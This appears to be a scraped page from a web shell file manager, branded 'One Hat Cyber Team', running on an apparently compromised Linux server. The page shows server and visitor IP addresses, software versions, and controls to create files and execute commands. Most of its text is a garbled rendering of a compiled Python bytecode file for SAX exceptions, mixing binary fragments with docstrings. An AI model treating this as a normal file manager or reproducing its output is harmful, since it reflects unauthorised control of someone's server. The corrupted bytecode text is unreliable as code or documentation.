⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.144
Server IP:
157.245.143.252
Server:
Linux www 6.11.0-9-generic #9-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct 14 13:19:59 UTC 2024 x86_64
Server Software:
nginx/1.26.0
PHP Version:
8.3.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
lib
/
python3.12
/
xml
/
sax
/
__pycache__
/
View File Name :
_exceptions.cpython-312.pyc
CRh[ v d Z G d de Z G d de Z G d de Z G d de Z G d d e Zy)z!Different kinds of SAX Exceptionsc 0 e Zd ZdZddZd Zd Zd Zd Zy) SAXExceptiona Encapsulate an XML error or warning. This class can contain basic error or warning information from either the XML parser or the application: you can subclass it to provide additional functionality, or to add localization. Note that although you will receive a SAXException as the argument to the handlers in the ErrorHandler interface, you are not actually required to raise the exception; instead, you can simply read the information in it.Nc L || _ || _ t j | | y)zUCreates an exception. The message is required, but the exception is optional.N)_msg _exception Exception__init__)selfmsg exceptions */usr/lib/python3.12/xml/sax/_exceptions.pyr zSAXException.__init__ s" #4% c | j S )z$Return a message for this exception.r r s r getMessagezSAXException.getMessage yyr c | j S )z9Return the embedded exception, or None if there was none.)r r s r getExceptionzSAXException.getException s r c | j S )0Create a string representation of the exception.r r s r __str__zSAXException.__str__ r r c t d )zvAvoids weird error messages if someone does exception[ix] by mistake, since Exception has __getitem__ defined.__getitem__)AttributeError)r ixs r r zSAXException.__getitem__" s ]++r )N) __name__ __module____qualname____doc__r r r r r r r r r s &,r r c 4 e Zd ZdZd Zd Zd Zd Zd Zd Z y) SAXParseExceptiona# Encapsulate an XML parse error or warning. This exception will include information for locating the error in the original XML document. Note that although the application will receive a SAXParseException as the argument to the handlers in the ErrorHandler interface, the application is not actually required to raise the exception; instead, it can simply read the information in it and take a different action. Since this exception is a subclass of SAXException, it inherits the ability to wrap another exception.c t j | || || _ | j j | _ | j j | _ | j j | _ y)zECreates the exception. The exception parameter is allowed to be None.N) r r _locatorgetSystemId _systemIdgetColumnNumber_colnum getLineNumber_linenum)r r r locators r r zSAXParseException.__init__7 sY dC3 224}}446 335 r c | j S )zNThe column number of the end of the text where the exception occurred.)r( r s r r' z!SAXParseException.getColumnNumberD s ||r c | j S )zDThe line number of the end of the text where the exception occurred.)r* r s r r) zSAXParseException.getLineNumberI s }}r c 6 | j j S )zEGet the public identifier of the entity where the exception occurred.)r$ getPublicIdr s r r/ zSAXParseException.getPublicIdM s }}((**r c | j S )zEGet the system identifier of the entity where the exception occurred.)r&